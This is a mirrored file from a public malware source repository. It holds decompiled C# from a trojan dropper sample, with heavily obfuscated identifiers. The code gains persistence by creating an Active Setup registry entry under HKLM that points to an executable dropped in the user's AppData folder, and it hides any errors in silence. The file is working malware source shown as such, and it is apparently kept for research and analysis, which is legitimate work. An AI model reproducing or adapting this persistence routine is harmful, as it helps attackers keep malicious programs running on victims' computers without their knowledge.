mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
37 lines
3.8 KiB
C#
37 lines
3.8 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP
|
|
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using Microsoft.Win32;
|
|
using System;
|
|
|
|
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
|
|
{
|
|
internal class HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP
|
|
{
|
|
public static string dnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBH = Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe";
|
|
public static string aiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhm = "{ACVPA-33X86-OB8PL-T8BWZ-TT2AE}";
|
|
|
|
public static void SJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGt() => HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.PFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZ();
|
|
|
|
public static void PFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZ()
|
|
{
|
|
try
|
|
{
|
|
RegistryKey subKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Active Setup\\Installed Components\\" + HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.aiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhm);
|
|
subKey.SetValue("Pfad", (object) HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.dnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBH);
|
|
subKey.SetValue("IsInstalled", (object) 1, RegistryValueKind.DWord);
|
|
subKey.Close();
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
}
|
|
}
|
|
}
|